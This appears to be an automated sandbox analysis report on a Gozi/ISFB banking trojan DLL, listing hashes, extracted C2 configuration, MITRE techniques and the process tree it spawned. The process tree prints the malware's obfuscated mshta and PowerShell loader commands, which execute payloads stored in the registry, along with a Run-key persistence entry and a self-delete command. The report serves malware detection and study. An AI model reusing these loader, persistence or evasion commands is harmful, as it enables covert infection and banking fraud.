gozi | 894668791d06262dd16740235faa3b1672e2cb5cf171954f29abaca421c09265

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
04-07-2023 10:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b565aa423ca4ba6e8c6b208c22e5b056.dll
Size

585KB
MD5

b565aa423ca4ba6e8c6b208c22e5b056
SHA1

0f661ba97e702021988fa372fde43bd3165f1cfe
SHA256

894668791d06262dd16740235faa3b1672e2cb5cf171954f29abaca421c09265
SHA512

b426343c6e8fa54e892fdbf506f1865d89e134e25ff9552bfe2dea36e791a017380aa5220c1af08922e2619d49731f73889de2e6e2efc155c64f4f6f87d701dd
SSDEEP

6144:2Qs4GPx2zWaTL8pxi5mLgNKz+ODzKaDtdjokutIC54VQQkPBRm2mZOkjnEsWKsGs:Y4sQiMjNa+ODmsWDOWrK1idIGd

Score

10^/10

gozi 5050 banker isfb persistence trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

https://avas1ta.com/in/login/

itwicenice.com

Attributes

base_path
/jerry/
build
250259
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

https://avas1t.de/in/loginq/

itwicenice.com

Attributes

base_path
/pictures/
build
250259
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation	mshta.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HandlerDocument = "cmd /c start C:\\Users\\Admin\\HandlerDocument.lnk -ep unrestricted -file C:\\Users\\Admin\\ActiveSettings.ps1"	Explorer.EXE

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3640 set thread context of 3140	3640	powershell.exe	Explorer.EXE
PID 3140 set thread context of 3772	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 set thread context of 4048	3140	Explorer.EXE	cmd.exe
PID 3140 set thread context of 3740	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 set thread context of 5092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 set thread context of 2092	3140	Explorer.EXE	RuntimeBroker.exe
PID 4048 set thread context of 4396	4048	cmd.exe	PING.EXE
PID 3140 set thread context of 4020	3140	Explorer.EXE	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4396 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

4396 PING.EXE

pid	process
4396	PING.EXE

pid	process
4396	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

regsvr32.exepowershell.exeExplorer.EXE

pid	process
1892	regsvr32.exe
1892	regsvr32.exe
3640	powershell.exe
3640	powershell.exe
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3640 powershell.exe
3140 Explorer.EXE
3140 Explorer.EXE
3140 Explorer.EXE
3140 Explorer.EXE
3140 Explorer.EXE
4048 cmd.exe
3140 Explorer.EXE

pid	process
3640	powershell.exe
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
4048	cmd.exe
3140	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE
Token: SeShutdownPrivilege	3140	Explorer.EXE
Token: SeCreatePagefilePrivilege	3140	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3140 Explorer.EXE

pid	process
3140	Explorer.EXE

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

regsvr32.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2876 wrote to memory of 1892	2876	regsvr32.exe	regsvr32.exe
PID 2876 wrote to memory of 1892	2876	regsvr32.exe	regsvr32.exe
PID 2876 wrote to memory of 1892	2876	regsvr32.exe	regsvr32.exe
PID 3640 wrote to memory of 1944	3640	powershell.exe	csc.exe
PID 3640 wrote to memory of 1944	3640	powershell.exe	csc.exe
PID 1944 wrote to memory of 3388	1944	csc.exe	cvtres.exe
PID 1944 wrote to memory of 3388	1944	csc.exe	cvtres.exe
PID 3640 wrote to memory of 4944	3640	powershell.exe	csc.exe
PID 3640 wrote to memory of 4944	3640	powershell.exe	csc.exe
PID 4944 wrote to memory of 2060	4944	csc.exe	cvtres.exe
PID 4944 wrote to memory of 2060	4944	csc.exe	cvtres.exe
PID 3640 wrote to memory of 3140	3640	powershell.exe	Explorer.EXE
PID 3640 wrote to memory of 3140	3640	powershell.exe	Explorer.EXE
PID 3640 wrote to memory of 3140	3640	powershell.exe	Explorer.EXE
PID 3640 wrote to memory of 3140	3640	powershell.exe	Explorer.EXE
PID 3140 wrote to memory of 4048	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 4048	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 4048	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 3772	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 3772	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 3772	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 3772	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 3740	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 3740	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 4048	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 3740	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 4048	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 3740	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 5092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 5092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 5092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 5092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 2092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 2092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 2092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 2092	3140	Explorer.EXE	RuntimeBroker.exe
PID 3140 wrote to memory of 4020	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 4020	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 4020	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 4020	3140	Explorer.EXE	cmd.exe
PID 4048 wrote to memory of 4396	4048	cmd.exe	PING.EXE
PID 4048 wrote to memory of 4396	4048	cmd.exe	PING.EXE
PID 4048 wrote to memory of 4396	4048	cmd.exe	PING.EXE
PID 4048 wrote to memory of 4396	4048	cmd.exe	PING.EXE
PID 4048 wrote to memory of 4396	4048	cmd.exe	PING.EXE
PID 3140 wrote to memory of 4020	3140	Explorer.EXE	cmd.exe
PID 3140 wrote to memory of 4020	3140	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3772

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5092

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3740

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\b565aa423ca4ba6e8c6b208c22e5b056.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\b565aa423ca4ba6e8c6b208c22e5b056.dll
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cfac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cfac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\13760A43-5684-BDEF-F8F7-EA41AC1BBE05\\\ActiveSettings'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
PID:2704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name quwwtipit -value gp; new-alias -name kdxnglebvj -value iex; kdxnglebvj ([System.Text.Encoding]::ASCII.GetString((quwwtipit "HKCU:Software\AppDataLow\Software\Microsoft\13760A43-5684-BDEF-F8F7-EA41AC1BBE05").LocalLocal))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3640

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sbe2ffj4\sbe2ffj4.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB91A.tmp" "c:\Users\Admin\AppData\Local\Temp\sbe2ffj4\CSCBEB6D2D425E64FCAB7D4E86F8BFBE5E1.TMP"
5⤵
PID:3388

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4s3ri0ff\4s3ri0ff.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA43.tmp" "c:\Users\Admin\AppData\Local\Temp\4s3ri0ff\CSCC0622E8D3985478AA6F736BE34E48856.TMP"
5⤵
PID:2060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\b565aa423ca4ba6e8c6b208c22e5b056.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4396

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4s3ri0ff\4s3ri0ff.dll

Filesize
3KB

MD5
c2dd433e84f713873df13ec5d4ae499a

SHA1
8e2b40b0959cc89a2eb7e20abc47beae5b78aba6

SHA256
4c1f4dd1afe287eef4a6008154783ff5bcf8634c8d16f1f599b864700faa8f75

SHA512
ce3efb5050e3a8215ad6c21a366f6c2473e2862996fda56888dc8c0c3601571b6b9d16457bfb8faa37b2a5be6b65236d3561033aae7dc824aafee89071cf33ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB91A.tmp

Filesize
1KB

MD5
66d3a98c6945bd5c2992684f75d30fc1

SHA1
9b3c67b807ee026032746ef9ea48d93bd6d352fc

SHA256
9fdb0fdf780ad6fc582d3830686f7646d1b8fff5f9874586ec4094465b967494

SHA512
426b18033e2e177cea03964ac6ad6fa27bfecd91899a476fb9564c2b9dea41d33f65353561fbe14b12c8d3477ceb8bd673156e6b59501ba3b0a3ed737052e4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBA43.tmp

Filesize
1KB

MD5
5f3f6ca8e1662d2f781ce1f8627c0671

SHA1
e490f32bcaf1580fa09802333fedf4a7a4b72daa

SHA256
3418a7cc56ac29db7736499706b161ffc19880e60270eb357f8839602eb105c1

SHA512
1a7d557fc8014b3f7f2838ba2a10610b83ffc164e33624208f9bab3ffbb52abb1f60ba1c7a95ae5d15222a4a4bf11a7d831b0792f317ab0b19ac40511b073f0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14h2a1xg.h3i.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sbe2ffj4\sbe2ffj4.dll

Filesize
3KB

MD5
28f44e60183bc3d02d337b6dd6da06cb

SHA1
e349d2f5e28013a4b5921e6a6ab9f2c2433b9e2f

SHA256
566fa7ca3782e77e4612b59258e9c4f645563339c6f3c6ec6b683dccd9204a87

SHA512
4af7ddb1234e0e6ba880db37c761c81af10ad8ff48a0a8429c5d7467ba51de9334b06b0d91be39454e08a8f7dcd7d7b3fb7b705ddc0e87daf3bc7122c88ca125

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4s3ri0ff\4s3ri0ff.0.cs

Filesize
412B

MD5
290e901d2ca9801a33ba1c2e1a28326a

SHA1
ffba41172744d79b40905e37d607f2a6a28e30cc

SHA256
6e9926b1981afd9dedfa73fd8f792ef11fc433073bfc8791be35fa4d802a86f5

SHA512
1077660f0ad43c5c69fee7576f70f04d017524eec8ddbb8f80cc7b0801df2ab3dac540cfdc08bb42e39c37caf215d7ca027f6deb2df924c1831382c5e4687b06

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4s3ri0ff\4s3ri0ff.cmdline

Filesize
369B

MD5
fc725c8682e417500e4251da215003b4

SHA1
ebdfba19447803154f58e642dc957cbc9039c54b

SHA256
763823461644d8d205f4c2bcb26e95caf3cc38b86a6045b7bb7d3f126eb3736e

SHA512
ddf06c871cff626a854046b16888a97f4c2e41d8c896736221ced5ae4411d9fb0011d223e263bf4bc930b55590f5e0cb7ebebdf45dede2d5b0a5f5b9c7cb8ff3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4s3ri0ff\CSCC0622E8D3985478AA6F736BE34E48856.TMP

Filesize
652B

MD5
2c1820be3d2c652c88a60c3b066063fe

SHA1
ae1178d94d827d7198c0b4395dceec8e00264496

SHA256
03dd5d0b1b93713fa45a8e8b2be6764c647285c5c993ab1771d0792f431e2f8a

SHA512
129239c7c2cfad6f5ca5932c2e067b18e5cb3fcd371ec39bf61907630e84d428545011899a510cf55171412da21ca67c0093785e3d44f8db9b89136c43dfea73

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sbe2ffj4\CSCBEB6D2D425E64FCAB7D4E86F8BFBE5E1.TMP

Filesize
652B

MD5
67e687047634d82449ba4a9fc83a9589

SHA1
3e1201377fb5a1f37c8ed93ae26a1d344739a2de

SHA256
9a12771dd96cb4a35ad48ce4679548bd96fbef4ebebcfee9df19f12f51512270

SHA512
03651dd82c2392f1daa863df001d7daf39a8f7642861fe140dae598323d9f0052e09f8c30afefd2a5ff7112edc863601e72ea3be2bbb315f32deac1ccdf1c69c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sbe2ffj4\sbe2ffj4.0.cs

Filesize
419B

MD5
6f9929170a31b4128137fa54d631bf2e

SHA1
77e54c09aacad9ec0fa5e09894a54066d5630c36

SHA256
88df79379c27a718e26a0ab4d3cf710c67b36a9b5fa155e044791710e59e3c3f

SHA512
22a8d34ecc787f6e30bdbda3d14bc578cf824a31eb31149b770a207f28eff877ae2d961aab13ce1cc99487536196d2a2b15acedbcdd4536db1bf87d60f265f76

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sbe2ffj4\sbe2ffj4.cmdline

Filesize
369B

MD5
998093141d2d553987ded6a6cecb5785

SHA1
12628d6e7b95b70dd5df164a950abe7c6991ad54

SHA256
74c5cbdad58bf3133897a37963b85159c90566806aad148db86c5d50c9ebe253

SHA512
776b7cf420a580027c79507b638fd10082c8b37f202fbaa87158554df5eee67a0acbd6a21fd05a016da6d60a3e9cf3da820ceb3fcf7e23de3c4b6b00a97aaeab

Download Submit
memory/1892-133-0x0000000000DA0000-0x0000000000DDF000-memory.dmp

Filesize
252KB

Download
memory/1892-247-0x0000000000B60000-0x0000000000B6E000-memory.dmp

Filesize
56KB

Download
memory/1892-138-0x0000000000B60000-0x0000000000B6E000-memory.dmp

Filesize
56KB

Download
memory/1892-135-0x0000000000DF0000-0x0000000000DFD000-memory.dmp

Filesize
52KB

Download
memory/1892-134-0x0000000000B60000-0x0000000000B6E000-memory.dmp

Filesize
56KB

Download
memory/2092-239-0x000002568C8C0000-0x000002568C8C1000-memory.dmp

Filesize
4KB

Download
memory/2092-242-0x000002568C810000-0x000002568C8B3000-memory.dmp

Filesize
652KB

Download
memory/2092-219-0x000002568C810000-0x000002568C8B3000-memory.dmp

Filesize
652KB

Download
memory/3140-252-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-264-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-194-0x0000000002820000-0x0000000002821000-memory.dmp

Filesize
4KB

Download
memory/3140-197-0x0000000008920000-0x00000000089C3000-memory.dmp

Filesize
652KB

Download
memory/3140-254-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-268-0x0000000002810000-0x0000000002812000-memory.dmp

Filesize
8KB

Download
memory/3140-253-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-267-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-187-0x0000000008920000-0x00000000089C3000-memory.dmp

Filesize
652KB

Download
memory/3140-251-0x0000000008920000-0x00000000089C3000-memory.dmp

Filesize
652KB

Download
memory/3140-256-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-266-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-265-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-257-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-258-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-255-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-259-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-262-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-263-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-261-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3140-260-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/3640-158-0x00000226B1310000-0x00000226B1320000-memory.dmp

Filesize
64KB

Download
memory/3640-159-0x00000226B1310000-0x00000226B1320000-memory.dmp

Filesize
64KB

Download
memory/3640-193-0x00000226C9880000-0x00000226C98BC000-memory.dmp

Filesize
240KB

Download
memory/3640-153-0x00000226B11A0000-0x00000226B11C2000-memory.dmp

Filesize
136KB

Download
memory/3640-142-0x00000226B1310000-0x00000226B1320000-memory.dmp

Filesize
64KB

Download
memory/3740-230-0x00000200F51F0000-0x00000200F51F1000-memory.dmp

Filesize
4KB

Download
memory/3740-231-0x00000200F5BB0000-0x00000200F5C53000-memory.dmp

Filesize
652KB

Download
memory/3740-207-0x00000200F5BB0000-0x00000200F5C53000-memory.dmp

Filesize
652KB

Download
memory/3772-226-0x000002340AB30000-0x000002340ABD3000-memory.dmp

Filesize
652KB

Download
memory/3772-225-0x000002340A910000-0x000002340A911000-memory.dmp

Filesize
4KB

Download
memory/3772-201-0x000002340AB30000-0x000002340ABD3000-memory.dmp

Filesize
652KB

Download
memory/4020-246-0x0000000000550000-0x00000000005E8000-memory.dmp

Filesize
608KB

Download
memory/4020-245-0x0000000000550000-0x00000000005E8000-memory.dmp

Filesize
608KB

Download
memory/4020-236-0x0000000000550000-0x00000000005E8000-memory.dmp

Filesize
608KB

Download
memory/4020-244-0x00000000004C0000-0x00000000004C1000-memory.dmp

Filesize
4KB

Download
memory/4048-229-0x00000206EE5A0000-0x00000206EE643000-memory.dmp

Filesize
652KB

Download
memory/4048-250-0x00000206EE5A0000-0x00000206EE643000-memory.dmp

Filesize
652KB

Download
memory/4048-228-0x00000206EE650000-0x00000206EE651000-memory.dmp

Filesize
4KB

Download
memory/4048-206-0x00000206EE5A0000-0x00000206EE643000-memory.dmp

Filesize
652KB

Download
memory/4396-248-0x0000026DE5640000-0x0000026DE5641000-memory.dmp

Filesize
4KB

Download
memory/4396-234-0x0000026DE5590000-0x0000026DE5633000-memory.dmp

Filesize
652KB

Download
memory/4396-249-0x0000026DE5590000-0x0000026DE5633000-memory.dmp

Filesize
652KB

Download
memory/5092-235-0x000001D6FBB40000-0x000001D6FBBE3000-memory.dmp

Filesize
652KB

Download
memory/5092-232-0x000001D6FB3E0000-0x000001D6FB3E1000-memory.dmp

Filesize
4KB

Download
memory/5092-214-0x000001D6FBB40000-0x000001D6FBBE3000-memory.dmp

Filesize
652KB

Download